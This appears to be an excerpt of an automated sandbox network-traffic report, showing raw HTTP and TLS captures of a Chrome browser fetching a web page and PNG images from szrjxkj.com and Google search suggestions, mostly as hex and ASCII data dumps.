            Mar 13, 2025 10:53:19.517323017 CET1236INData Raw: 39 75 88 12 c9 5c e6 7c b6 76 69 a0 fa 51 ca a1 21 eb a4 fc 62 8c 87 b5 51 f3 5b f4 6f dc 1d 09 4c 7e ca 21 28 28 e7 dd 74 14 11 1f 48 59 98 8a 71 49 7a 3e 5f 78 4f b3 e6 70 aa 6a d9 f8 d1 85 1e d6 80 e2 fe ef cd 0d 1f 19 16 78 16 71 6f bd d9 97
            Data Ascii: 9u\|viQ!bQ[oL~!((tHYqIz>_xOpjxqoK,o\+sX&^=f-7T'EgEF<~Rb:i[XHBTMp9}--TPvIj:N#]Ez5Gu/K,<@d]R}kQ`O?}5}yu?|
            Mar 13, 2025 10:53:19.517334938 CET448INData Raw: 1a 3f 71 41 2e 48 d5 c2 ea 04 28 9b 30 93 ac fd a0 2f a5 ea ba 62 71 78 76 f3 58 ad 18 ce 94 1f 7e 85 a4 59 be 2e 53 88 46 da 52 8f d2 16 7b a7 e2 63 4b 37 9a 3f 90 e7 69 fc 5d a4 78 c6 2a 72 7d 2f 2b fd c0 c3 c9 8f 4c 53 43 42 88 96 44 b3 b4 54
            Data Ascii: ?qA.H(0/bqxvX~Y.SFR{cK7?i]x*r}/+LSCBDTf^{Mo+RU+R_[Z~f[@YxG!RDA/|BgUQxWU1LEk-'Vehw(wgJOL[X]*v{"
            Mar 13, 2025 10:53:19.519762039 CET1236INData Raw: a9 c4 67 69 11 67 03 fa d5 3b db fe 7d 31 c2 f0 41 0e a6 ac b7 e2 bb a3 db 7f 8f 10 dd 56 48 49 34 f4 bf c9 1f 04 1a 89 b9 b5 96 eb 7b 44 eb 56 5c 38 01 23 86 7e 92 33 63 c8 8a 88 34 cb c3 8c a3 00 a9 d4 48 88 6b 33 9f 8a 23 9f d8 0f 49 9c b8 79
            Data Ascii: gig;}1AVHI4{DV\8#~3c4Hk3#Iydouh /EMuGf^oMF]|%ehkbLo>QN?{UUq(ML+R?Whq/|4xW>A<0BWR_l\"8s
            Mar 13, 2025 10:53:19.519773960 CET1236INData Raw: 0c af 39 da ff 7f 5e 52 36 52 e7 f9 60 3e f9 3a 7a cf f8 a2 b6 85 2b e2 99 62 0a a4 dd f3 cb 22 15 1a 0f bd 9f 05 6a 54 df 0b e0 46 9e 5a a8 b9 c3 f3 73 49 42 be ea ad 6e 6f 88 88 94 70 1f de 53 a0 9c 3a 73 19 b2 ce 46 c7 ea 52 02 56 81 93 cd 10
            Data Ascii: 9^R6R`>:z+b"jTFZsIBnopS:sFRV{FPQtaz%"zEd5ICazSd02ZdVnL`hyn}wXH8\dpPNj<>m[,[cWR j[#Y
            Mar 13, 2025 10:53:19.519785881 CET448INData Raw: 74 89 92 57 fa 30 63 b7 16 e1 53 09 d4 7a 2f 98 09 c1 ed 2f 16 d5 6c b3 b6 f8 16 4b bd 4b 96 ee cf 7a d5 58 03 8e 77 0a 47 58 57 9d 61 a2 fb c1 c3 13 18 83 50 b7 d1 b2 30 78 d3 97 cf a3 85 e8 34 af 98 65 ab 48 01 36 d9 b2 66 3a 4b 9b 16 e1 3e e4
            Data Ascii: tW0cSz//lKKzXwGXWaP0x4eH6f:K>7^Hk#.MZMB4*@x6\zX0k,zz+lk"|:0X-8@EUn'bDi^C{pj3 u5kcGl?\1Gp
            Mar 13, 2025 10:53:19.523935080 CET1236INData Raw: 32 3d cb 27 e4 c0 58 bf 14 cd 73 0c 29 1b ea 77 02 fd 05 14 67 36 ce 60 8e 5c 3f 58 b1 ee aa 81 6b db 15 6c b6 64 e1 4d fd f1 8f 8d 7e c7 27 5a 96 89 a1 79 1c b9 01 27 72 84 a4 d4 71 8b cb b0 35 ff 31 4e ae f3 d9 b0 0f 04 31 b0 97 91 6e 53 6f 26
            Data Ascii: 2='Xs)wg6`\?XkldM~'Zy'rq51N1nSo&@D"Wx%d0{*qt4=*3?QT"MP-Z8o"jf^LGmpP{Ykv*sMh=o$ 6f]%u!Mdo^JNu4
            Mar 13, 2025 10:53:19.523960114 CET1236INData Raw: 45 1c 36 ee 01 b0 85 06 da 48 17 83 a9 09 fc 9e b1 b4 8d 4b 4d 2b fe f2 ec 34 94 ff bc 37 1b 23 f1 ee 3f 47 01 8b 24 20 78 4b a2 23 ed 3b f8 74 54 94 4c c4 e5 9e 80 d3 b7 94 1e 97 00 79 c8 f9 3c e7 34 57 c7 50 c9 ea 48 09 c6 44 cf 15 dd 7e 55 92
            Data Ascii: E6HKM+47#?G$ xK#;tTLy<4WPHD~UrwU'{%p1!5>&vG4CLQM'[w#sEh,}Wo8m2<_~_C^eDCo8=lrY<br#OCG6[iW/h7({HP
            Mar 13, 2025 10:53:19.523971081 CET448INData Raw: 9f 2f 5c 98 dd 7b cd 35 16 fb aa 01 a6 16 2f fa d7 c0 3b aa ca 3b 9f a5 a6 4a 34 0c dc 2e 34 07 42 89 67 7e ba 92 de 11 d0 e3 92 8a b5 4b 90 3e 77 3e e4 e6 a5 d2 4d ec a0 01 b1 89 dd aa f4 d4 b7 99 23 5f 0b 0e 83 a7 0f b3 d2 db 6b 52 d7 55 d7 1e
            Data Ascii: /\{5/;;J4.4Bg~K>w>M#_kRU-G;_HXv/5mP$g}q4x*6BfNUVhWUC'Ba*i4SIY=-l%y3f`%AxT'opVRQ/)e>0\
            Mar 13, 2025 10:53:19.529283047 CET1236INData Raw: d6 c3 13 e8 6d ab 1f fa 13 ec d7 ed 05 76 54 9b e1 f7 ff 11 d7 ef ff e0 7c d0 f9 7c 3c 6d fb 1c 3e 36 b5 18 27 86 ff 2e ab 2e af 65 1b 54 06 90 b1 82 56 f1 8d cc 31 ea ea bb a6 e7 d9 50 72 97 e7 58 96 e4 10 78 65 b6 ed c4 14 7a 92 94 75 05 42 35
            Data Ascii: mvT||<m>6'..eTV1PrXxezuB5L(GM['2:VLYoD(m}!7Qr`me5@/ZD>P*hwS ex9&S;I/VWxpK(.j?/:(OK&#
            Mar 13, 2025 10:53:19.529304981 CET1236INData Raw: 35 cb 01 68 d0 0c e2 f7 cf 21 3c 80 a5 c5 f0 6f 64 f5 8c 1e b7 37 5f b7 45 c7 78 1f 55 cf 49 48 ec 98 3f 1a 50 90 8a 5a 97 0e c1 81 7f cc 3a 15 04 ed 92 e4 7e 12 3e 5e d6 1f ec a2 6d 0a bf 4e d2 b6 8f ec e4 8d 7c ee 6c e9 93 6e a1 a0 57 a6 1c 5c
            Data Ascii: 5h!<od7_ExUIH?PZ:~>^mN|lnW\/K?5F])eu,Rn}.)(oGE$9/^Fj&fq"yMlyV+;-A-] \cc[j(sQ[z>%NaDIG`*,qZ


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            9192.168.2.44974638.174.150.133801004C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            Mar 13, 2025 10:53:19.164665937 CET291OUTGET /skin/images/logo-footer.png HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: */*
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:20.117929935 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:19 GMT
            Content-Type: image/png
            Last-Modified: Wed, 08 Nov 2023 16:08:12 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb26c-91f"
            Expires: Sat, 12 Apr 2025 09:53:19 GMT
            Cache-Control: max-age=2592000
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 39 33 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 28 08 d7 f7 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 81 00 00 00 65 08 06 00 00 00 6a 75 80 c4 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 c9 49 44 41 54 78 5e ed 9d 3d 8e dd 36 14 46 a7 30 e0 22 55 b6 60 a4 4a 4a 6f 21 5b f0 16 bc 05 b7 01 d2 78 0b 5e 83 fb 34 a9 d2 bb 76 e7 2a 5d 0a 03 2e 53 d9 e7 93 48 41 3f 97 14 29 51 6f a4 f7 ee 01 88 27 f1 92 94 78 ef 27 8a e4 bc 99 79 7a 44 be 7f ff fe 92 f4 8e f4 85 f4 3f e9 73 38 7f 11 8a 38 f7 0c 81 fe 89 f4 37 c9 e2 2f d2 cb 50 d4 b9 47 08 b0 04 f0 8f a2 0d ff 92 7e 27 69 54 d0 e7 7f 24 e1 42 b8 57 08 ec 5c 00 bf 04 53 07 e7 bf 91 5c 08 f7 0a 01 cd 0a 20 42 be 0b e1 1e 21 90 45 02 88 60 77 21 dc 13 04 b0 4a 00 11 ca b9 10 ee 01 02 b7 49 00 11 ca bb 10 ae 0c 01 db 25 80 08 f5 5c 08 57 84 40 35 11 40 84 fa 2e 84 2b 41 80 9a 0a 20 42 3b 2e 84 2b 40 60 0e 11 40 84 f6 5c 08 67 86 80 1c 2a 80 08 ed ba 10 ce 08 81 b8 89 00 22 b4 ef 42 38 13 04 a0 [TRUNCATED]
            Data Ascii: 93b(PNGIHDRejusRGBgAMAaIDATx^=6F0"U`JJo![x^4v*].SHA?)Qo'x'yzD?s887/PG~'iT$BW\S\ B!E`w!JI%\W@5@.+A B;.+@`@\g*"B8ZyA_I"e\g@ppQ4\Sr.[7O*D{B*u!Y-d2[W58tD_HBkpnz".V&}=!8tgRPT6ka8J9.C8Pj)$PRD&[`w!c@d5PsT>+95h@ylGT6}P%gy$/>tX*}.d;8CLh$KC3NpfB3&AgHn^,}JWU!P6suWsp| +W',pB1tZa 5u&e-Pm hTZobrU]-c!
            Mar 13, 2025 10:53:20.117943048 CET1236INData Raw: c4 ef ee ed 22 34 6d 82 f9 5b 5f 6a 9b 08 a8 e6 02 38 02 1c d9 54 08 a1 59 13 cc 9b 45 40 15 17 c0 91 e0 d0 66 42 08 4d 9a 60 de 24 02 8a bb 00 6e 01 8e dd 3c 47 e8 ab 0c b4 fe 0d 24 17 c0 2d c1 c1 9b 84 40 b9 f9 ea a0 c9 36 33 e5 5c 00 cf 01 8e
            Data Ascii: "4m[_j8TYE@fBM`$n<G$-@63\eP8\Wl,n]g@D83P!C@;.+A.+Bz.+Cv.{m\v=B @!Y!px\YG0(($}8t
            Mar 13, 2025 10:53:20.117958069 CET285INData Raw: b0 6f 13 01 29 f5 de 4c fe 38 37 42 99 d4 6e 57 57 97 01 f7 00 08 ff cf 94 08 74 cd d4 50 1d 51 87 ac 79 83 d9 51 92 25 c8 31 ba 9e 35 6f 38 95 08 04 45 52 be c9 c6 04 fb 66 11 58 4b 13 73 07 cc 82 b2 d6 0d 77 17 e6 33 e9 60 3e 34 0f b1 02 a7 51
            Data Ascii: o)L87BnWWtPQyQ%15o8ERfXKsw3`>4Qi{O=E$"&PDeEp$_tQTN)P&Qg'd}wiBrYxzyA#k{q.;$i]sRMn'A!VNM?Ar
            Mar 13, 2025 10:53:20.387118101 CET294OUTGET /skin/images/footer-bgshape.png HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: */*
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:20.760818958 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:20 GMT
            Content-Type: image/png
            Last-Modified: Wed, 08 Nov 2023 16:08:12 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb26c-391f4"
            Expires: Sat, 12 Apr 2025 09:53:20 GMT
            Cache-Control: max-age=2592000
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 34 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 bb 77 54 93 69 b4 3d 1c 02 01 01 11 14 94 0e ce a0 20 4d 40 a4 04 81 80 ce 88 05 09 8a 54 81 50 44 84 28 2d 22 bd aa 80 12 01 45 8a 10 12 1c 95 16 aa 48 15 12 9a 41 42 73 a4 04 e9 0a 21 9a 50 13 42 12 08 e1 8b f3 5b eb bb 33 f7 ae f5 ae f5 ae bc 7f 9e 9c 67 9f bd f7 d9 cf 63 7b 3b 1b 09 31 05 31 00 00 20 71 f1 c2 1f d7 00 00 91 44 00 40 60 60 9f 30 ff cb e9 1f 0d 34 fe 4b 00 71 cd e6 2c a0 7a 48 e9 27 ff 87 90 bf f5 15 6b 00 a0 2e 53 9c eb 0d 02 00 f6 5a 2f fe 61 7d 3d d2 73 b9 fd 0a d6 8f d4 50 12 15 f3 b5 2c 45 51 d8 08 69 2d e1 fd 40 c7 f4 80 7c 6a 56 78 70 2e f1 f0 be 67 2f d5 4f 2e 29 1c ce ef 29 2b ab 94 f9 ba 19 0c 3e d8 ca 52 25 88 4e 79 34 61 09 86 84 48 8a 12 bc 28 ee ac 6a ae 8c 2a 25 ce bb 76 bc 00 11 3b d8 b2 35 7b b0 47 1a be 96 d0 8a 8b de 1a 86 e1 76 96 61 a6 93 f1 2e 3b 99 2c f4 2e 26 94 cb ee d3 0b 8e df 82 e6 fa b9 fe cf c3 14 a3 fe dc db 69 da 5b f9 29 9b b0 73 71 72 8f 3b 95 d9 1d ff c2 77 62 8f 3d 95 f0 64 a3 69 3c 16 e9 b7 7f [TRUNCATED]
            Data Ascii: 4000dwTi= M@TPD(-"EHABs!PB[3gc{;11 qD@``04Kq,zH'k.SZ/a}=sP,EQi-@|jVxp.g/O.))+>R%Ny4aH(j*%v;5{Gva.;,.&i[)sqr;wb=di<~vWV(9UF5.}y:Pf:qhu&R%fLUo{Qj82x 6Hl'v&'3^6eA+aeoc?i5bZSO,"q'}HW/*U!boYF[@+ST!HpVKx9krM@573fiS*kt`oc7h-+tp=pj5&A\D|!lBQ^qRm[>b|c6c?4rPS$!`&wi#|m/bYAu'UUzw}~Jz&g.RP@I;>RYgkgaZ1;L<HqO|(-\`48/
            Mar 13, 2025 10:53:20.760833979 CET224INData Raw: 2e 31 ef ba e6 86 07 83 d2 4e 03 e2 cb 85 01 f1 c5 f8 90 ff 14 68 1c fb 26 e5 24 68 4a 28 5e 8c 77 2c 2d a0 a9 bf 38 94 dd 70 7c 9a 96 35 9a ec 2d 47 d1 7b 32 93 9b e8 3f b6 68 36 64 38 97 12 c1 91 99 af 42 d5 0f 29 cd 35 64 84 13 85 72 b6 54 a4
            Data Ascii: .1Nh&$hJ(^w,-8p|5-G{2?h6d8B)5drT"E2Gb9XzEUE,jUt=AX.=|(xaf}vHc'L!Oco5Cm*IAr1{g .<MJtcF*QJVEk;Ut
            Mar 13, 2025 10:53:20.760870934 CET1236INData Raw: 32 94 a1 b3 d4 47 72 4b eb 24 33 7d ae 9c f3 81 6a 79 8d bd af a7 ab b7 e9 8e 50 a2 26 66 b2 fb 2e b2 6f dd bb 72 3c 7c 5a 90 83 5e 6b b9 b3 fa 71 e6 48 28 87 50 a7 d3 df 5a 03 3c ab 00 c0 9b 63 6b 92 70 1c a3 84 0e a6 2e ff e3 bb ff ff a9 74 3e
            Data Ascii: 2GrK$3}jyP&f.or<|Z^kqH(PZ<ckp.t>+0FSd}{0H$/xEpFB9C. r'y5=3kE%_>8)j| TO=Q|Q6TZ!8||BfK/t1GY5
            Mar 13, 2025 10:53:20.760891914 CET224INData Raw: 98 4c 62 ae 58 de 97 cc 29 05 7c 79 bb cd 5e 36 a3 2e 6c 8d 64 b0 3d de 11 a1 b1 cc ae ab 3c a2 c9 42 d3 5e 75 ef c4 fa cf 71 dc 35 6d ca d7 0c a3 f7 c1 1d 4d 30 77 d8 4c 5b aa 68 07 f0 9e 34 f5 17 29 e1 2d cc f8 ab 32 ea c3 f7 78 eb 4b b0 bd 5d
            Data Ascii: LbX)|y^6.ld=<B^uq5mM0wL[h4)-2xK]z~|}P8=+g@XP.7W!q8?b3kb%9f1/@`@*ebjy0K@&Dma?
            Mar 13, 2025 10:53:20.760901928 CET1236INData Raw: 1d 35 61 a3 b4 50 d2 c7 5b 1e 63 4e 77 e2 40 f7 c6 ba f2 5a 2a 9a 9e 46 8f 8c c6 08 6c b5 c3 26 17 de 59 54 b3 8e c5 7d 53 9b c2 d9 bc 4e 51 6d e6 d7 37 5e fc 9f fa ae f8 6e cd 01 26 fe 7d 68 a3 c7 5e cc 57 26 5e ea bc 9e 94 27 37 1c 95 f4 7b 06
            Data Ascii: 5aP[cNw@Z*Fl&YT}SNQm7^n&}h^W&^'7{`6*(c8|(sC 6S|bT|IbHDQnY(!@*/!]h5\C7sj,Xdiftc*x1!0lI$5Mb<-
            Mar 13, 2025 10:53:20.760914087 CET1236INData Raw: c3 c2 f7 d3 da 70 d1 4e b5 0a e9 13 c2 9d 56 9f 44 83 99 05 df c3 bb dd 3b a1 83 c1 aa 02 b6 02 d7 3b 87 18 2d 9e 92 ee d9 d2 09 9d 57 ab c9 bd 13 f2 ef 4e a9 c3 c8 cf 0c 6a 58 42 94 c5 fc da 46 2b fa 0a 53 e6 4e 11 29 46 82 ea 4b 29 73 19 eb 2e
            Data Ascii: pNVD;;-WNjXBF+SN)FK)s.V[/hhKXg?!nh,FJo[m!^(@/ls(^)Nh_\NS/;q9Fk;&{_A(
            Mar 13, 2025 10:53:20.760927916 CET448INData Raw: 4d 18 9c ee fc 7e ab c3 b5 63 0e 0d 89 4e 1f 1f ed 11 35 60 b1 42 4e 60 bd e6 1b d0 fd 86 09 7d f9 d9 98 e2 ea 78 c1 c8 a5 43 c7 2c 6b d2 a3 a8 b4 3e 4f 79 52 8f 97 fb 42 ff d5 cf a6 d5 d2 d1 f5 ab c9 8b 9c 86 09 6d 58 8f c0 43 4c db 5e 1e 04 81
            Data Ascii: M~cN5`BN`}xC,k>OyRBmXCL^6G(h)n7O5N*g?RRk=*J~r()`lIHUO==Bk.Ph<_LVNICS8ohS[DDGH[
            Mar 13, 2025 10:53:20.760938883 CET1236INData Raw: cf aa a5 c1 f7 5b aa 15 4f 03 56 2a 4a 0d 6c 79 f5 30 a4 01 7d 95 95 49 b5 87 ad f5 29 90 b8 9e 53 75 4d f5 e4 e8 1d dd 40 be e7 b5 27 f4 70 51 72 2b e5 59 a3 ea 2c 55 bb 58 22 91 af d5 ff 65 e8 5c 10 4c 1b d2 50 02 0f 97 52 c3 3c 6b 1f b5 a8 bd
            Data Ascii: [OV*Jly0}I)SuM@'pQr+Y,UX"e\LPR<kom2j{QzP2J<7z>V$[KQn6c-v#L20UIO$YY]qFa(R.g^lHaDDFjOm'2ya0[fYwfg|u[w
            Mar 13, 2025 10:53:20.760951042 CET224INData Raw: 02 3c e3 8a e0 29 7b db 55 f3 69 fe 50 0e 14 b8 e1 76 68 3f d9 28 2a e5 2d 8a 71 73 35 d6 4c 56 30 23 10 85 e0 32 e3 f3 c1 a6 c0 bb e4 26 bc 42 eb ec b9 82 e1 9a 8b c3 be 1f 35 9d 8e 1e 91 06 dc aa f6 dc eb 65 4d 21 9f a9 2e 54 24 f0 dc 7e 20 24
            Data Ascii: <){UiPvh?(*-qs5LV0#2&B5eM!.T$~ $2Rp-Ad(smq^ynDq{[R`(q;z*NFJpZ g1Fw(y{CHH-,{st?kK.O


            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
            Mar 13, 2025 10:53:26.129125118 CET156.224.2.38443192.168.2.449745CN=oudngmslhifnsf.gdmgcyy.com CN=E5, O=Let's Encrypt, C=USCN=E5, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USSun Dec 15 06:44:50 CET 2024 Wed Mar 13 01:00:00 CET 2024Sat Mar 15 06:44:49 CET 2025 Sat Mar 13 00:59:59 CET 2027771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,16-13-35-10-23-5-11-43-27-65281-0-51-17613-65037-18-45,4588-29-23-24,0d2cb224306523f543f79a2664249676a
            CN=E5, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.44972738.174.150.1334431004C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2025-03-13 09:53:04 UTC678OUTGET /dongtai/8622.html HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
            sec-ch-ua-mobile: ?0
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: navigate
            Sec-Fetch-User: ?1
            Sec-Fetch-Dest: document
            Accept-Encoding: gzip, deflate, br, zstd
            Accept-Language: en-US,en;q=0.9


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.449722216.58.206.364431004C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2025-03-13 09:53:09 UTC595OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
            Host: www.google.com
            Connection: keep-alive
            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJShywEInP7MAQiFoM0BCL7VzgEIgNbOAQjI3M4BCK3ezgEIiuDOAQiu5M4BCOfkzgEIi+XOAQ==
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: empty
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept-Encoding: gzip, deflate, br, zstd
            Accept-Language: en-US,en;q=0.9
            2025-03-13 09:53:10 UTC1303INHTTP/1.1 200 OK
            Date: Thu, 13 Mar 2025 09:53:09 GMT
            Pragma: no-cache
            Expires: -1
            Cache-Control: no-cache, must-revalidate
            Content-Type: text/javascript; charset=UTF-8
            Strict-Transport-Security: max-age=31536000
            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-myumRSZEUtG-PKXH-cMjRw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
            Accept-CH: Sec-CH-Prefers-Color-Scheme
            Accept-CH: Downlink
            Accept-CH: RTT
            Accept-CH: Sec-CH-UA-Form-Factors
            Accept-CH: Sec-CH-UA-Platform
            Accept-CH: Sec-CH-UA-Platform-Version
            Accept-CH: Sec-CH-UA-Full-Version
            Accept-CH: Sec-CH-UA-Arch
            Accept-CH: Sec-CH-UA-Model
            Accept-CH: Sec-CH-UA-Bitness
            Accept-CH: Sec-CH-UA-Full-Version-List
            Accept-CH: Sec-CH-UA-WoW64
            Permissions-Policy: unload=()
            Content-Disposition: attachment; filename="f.txt"
            Server: gws
            X-XSS-Protection: 0
            X-Frame-Options: SAMEORIGIN
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Accept-Ranges: none
            Vary: Accept-Encoding
            Connection: close
            Transfer-Encoding: chunked
            2025-03-13 09:53:10 UTC75INData Raw: 31 30 63 65 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 75 73 61 61 20 64 61 74 61 20 62 72 65 61 63 68 20 73 65 74 74 6c 65 6d 65 6e 74 22 2c 22 62 6f 73 74 6f 6e 20 62 72 75 69 6e 73 20 62 72 61 64 20 6d 61 72 63 68 61 6e 64 22
            Data Ascii: 10ce)]}'["",["usaa data breach settlement","boston bruins brad marchand"
            2025-03-13 09:53:10 UTC1378INData Raw: 2c 22 77 77 65 20 6e 78 74 22 2c 22 6e 69 61 6e 74 69 63 20 70 6f 6b c3 a9 6d 6f 6e 20 67 6f 22 2c 22 6e 76 69 64 69 61 20 73 74 6f 63 6b 73 22 2c 22 6e 66 6c 20 64 72 61 66 74 20 66 72 65 65 20 61 67 65 6e 63 79 22 2c 22 73 65 76 65 72 61 6e 63 65 20 65 70 69 73 6f 64 65 73 22 2c 22 6e 61 73 61 20 73 70 61 63 65 78 20 63 72 65 77 20 31 30 20 6c 61 75 6e 63 68 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 6f 49 6b 6b 34 53 46 51 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58
            Data Ascii: ,"wwe nxt","niantic pokmon go","nvidia stocks","nfl draft free agency","severance episodes","nasa spacex crew 10 launch"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZX
            2025-03-13 09:53:10 UTC1378INData Raw: 55 39 44 52 6e 4e 31 53 31 56 79 55 57 74 77 51 32 6c 43 4f 56 42 55 63 31 5a 6c 64 33 64 46 65 6c 64 6f 56 47 46 35 61 46 6c 7a 63 45 70 7a 55 6d 70 71 5a 79 39 74 64 55 70 4b 61 31 59 32 63 31 4d 30 4f 46 59 31 56 56 4a 77 4e 31 56 77 57 57 4a 4b 55 7a 42 6f 57 48 6c 68 61 6a 49 79 63 30 4a 6d 51 55 52 42 54 6d 5a 6f 4c 31 56 4a 52 45 35 52 57 46 52 78 64 45 64 52 4e 30 64 73 4d 6a 42 50 62 48 52 54 4d 55 31 50 53 6b 4a 4c 56 6b 70 44 5a 6b 31 44 5a 55 78 71 59 32 4d 30 59 7a 56 4f 54 47 64 44 56 57 6c 73 4d 48 52 77 5a 46 46 77 4f 47 6c 57 52 31 52 79 59 57 4a 44 56 6e 42 6a 53 32 6c 30 55 54 46 76 4d 6b 6f 32 57 6c 56 74 4e 48 52 30 64 48 70 69 52 57 39 6e 65 57 35 4a 56 58 52 78 55 33 70 69 56 7a 4a 78 4e 45 49 33 4b 7a 4a 49 5a 57 78 74 64 56 4a 7a
            Data Ascii: U9DRnN1S1VyUWtwQ2lCOVBUc1Zld3dFeldoVGF5aFlzcEpzUmpqZy9tdUpKa1Y2c1M0OFY1VVJwN1VwWWJKUzBoWHlhajIyc0JmQURBTmZoL1VJRE5RWFRxdEdRN0dsMjBPbHRTMU1PSkJLVkpDZk1DZUxqY2M0YzVOTGdDVWlsMHRwZFFwOGlWR1RyYWJDVnBjS2l0UTFvMko2WlVtNHR0dHpiRW9neW5JVXRxU3piVzJxNEI3KzJIZWxtdVJz
            2025-03-13 09:53:10 UTC1378INData Raw: 68 62 6e 63 7a 52 7a 46 30 63 6c 45 72 55 31 5a 31 62 31 64 6f 55 30 4e 42 4d 6d 74 47 55 6a 4a 57 4d 30 46 49 64 6d 70 49 61 7a 56 70 63 47 74 4f 55 55 5a 4d 61 45 64 5a 4e 6b 56 6f 53 33 42 4e 4e 55 6c 54 53 45 78 44 4d 58 6b 79 61 7a 63 7a 4f 55 5a 78 56 56 42 69 51 56 5a 55 4b 31 6b 78 59 56 49 34 57 45 64 6b 61 6e 4e 4d 59 32 68 51 63 6c 70 59 54 45 73 77 62 31 46 52 51 31 46 44 63 54 56 42 51 6a 49 35 59 6b 68 30 64 6e 52 6f 52 58 4a 31 5a 44 42 4f 55 6a 52 71 52 55 4e 54 61 56 46 78 53 58 4d 35 53 6d 78 77 51 32 64 35 4d 6b 52 6c 4e 54 46 75 55 32 39 78 4e 44 4e 42 52 6e 4a 74 65 45 35 33 59 30 6c 6b 55 6d 35 35 59 57 78 4d 59 32 78 36 57 45 39 76 4f 44 52 69 63 56 56 46 61 45 6c 32 4f 55 46 42 51 69 73 79 54 57 4a 42 52 58 41 78 5a 48 46 56 4d 7a
            Data Ascii: hbnczRzF0clErU1Z1b1doU0NBMmtGUjJWM0FIdmpIazVpcGtOUUZMaEdZNkVoS3BNNUlTSExDMXkyazczOUZxVVBiQVZUK1kxYVI4WEdkanNMY2hQclpYTEswb1FRQ1FDcTVBQjI5Ykh0dnRoRXJ1ZDBOUjRqRUNTaVFxSXM5SmxwQ2d5MkRlNTFuU29xNDNBRnJteE53Y0lkUm55YWxMY2x6WE9vODRicVVFaEl2OUFBQisyTWJBRXAxZHFVMz
